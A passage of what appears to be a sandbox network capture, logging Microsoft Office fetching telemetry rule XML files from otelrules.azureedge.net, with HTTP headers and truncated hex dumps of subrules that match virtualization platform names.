                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            67192.168.2.45519513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:01 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:01 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:01 GMT
                            Content-Type: text/xml
                            Content-Length: 468
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                            ETag: "0x8DC582BB3EAF226"
                            x-ms-request-id: dd2a3af5-901e-0083-62a3-34bb55000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223901Z-1749fc9bdbdxm7w9hC1DFWy1k400000000u000000000usrz
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:01 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                            Session IDSource IPSource PortDestination IPDestination Port
                            68192.168.2.45519613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:01 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:02 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:01 GMT
                            Content-Type: text/xml
                            Content-Length: 485
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                            ETag: "0x8DC582BB9769355"
                            x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223901Z-16547b76f7f7rtshhC1DFWrtqn0000000mc0000000005azm
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:02 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            69192.168.2.45519713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:02 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:02 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:02 GMT
                            Content-Type: text/xml
                            Content-Length: 411
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                            ETag: "0x8DC582B989AF051"
                            x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223902Z-16547b76f7fvllnfhC1DFWxkg80000000md00000000025cw
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:02 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            70192.168.2.45519813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:02 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:02 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:02 GMT
                            Content-Type: text/xml
                            Content-Length: 470
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                            ETag: "0x8DC582BBB181F65"
                            x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223902Z-16547b76f7fj897nhC1DFWdwq40000000m4000000000eyf4
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:02 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            71192.168.2.45519913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:02 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:02 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:02 GMT
                            Content-Type: text/xml
                            Content-Length: 427
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                            ETag: "0x8DC582BB556A907"
                            x-ms-request-id: f3ae074e-d01e-0082-62af-36e489000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223902Z-1866b5c5fbbzcdbqhC1DFW3r3400000000d0000000007g8q
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                            Session IDSource IPSource PortDestination IPDestination Port
                            72192.168.2.45520013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:02 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:02 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:02 GMT
                            Content-Type: text/xml
                            Content-Length: 502
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                            ETag: "0x8DC582BB6A0D312"
                            x-ms-request-id: dcb3d461-101e-000b-6d69-355e5c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223902Z-1866b5c5fbbsqznnhC1DFWg28g00000000p000000000armz
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:02 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            73192.168.2.45520113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:02 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:02 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:02 GMT
                            Content-Type: text/xml
                            Content-Length: 407
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                            ETag: "0x8DC582B9D30478D"
                            x-ms-request-id: cf25fe23-201e-0000-80af-36a537000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223902Z-16547b76f7fr28cchC1DFWnuws0000000mbg00000000h59v
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            74192.168.2.45520213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:03 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:03 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:03 GMT
                            Content-Type: text/xml
                            Content-Length: 474
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                            ETag: "0x8DC582BB3F48DAE"
                            x-ms-request-id: 806b7f82-201e-0003-669a-36f85a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223903Z-16547b76f7fht2hfhC1DFWbngg00000000xg000000001ydr
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:03 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            75192.168.2.45520313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:03 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:03 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:03 GMT
                            Content-Type: text/xml
                            Content-Length: 408
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                            ETag: "0x8DC582BB9B6040B"
                            x-ms-request-id: ed171e7d-901e-0015-69a2-34b284000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223903Z-1866b5c5fbb4z978hC1DFW84sc00000000m000000000gkkv
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:03 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            76192.168.2.45520413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:03 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:03 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:03 GMT
                            Content-Type: text/xml
                            Content-Length: 469
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                            ETag: "0x8DC582BB3CAEBB8"
                            x-ms-request-id: da73b1ea-a01e-0070-5573-35573b000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223903Z-1866b5c5fbbqjkpbhC1DFWt4h400000000ng00000000ca3q
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:03 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            77192.168.2.45520513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:03 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:03 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:03 GMT
                            Content-Type: text/xml
                            Content-Length: 416
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                            ETag: "0x8DC582BB5284CCE"
                            x-ms-request-id: 50fcf232-201e-0085-635e-3534e3000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223903Z-r178fb8d765w8fzdhC1DFW8ep4000000033000000000m7wn
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
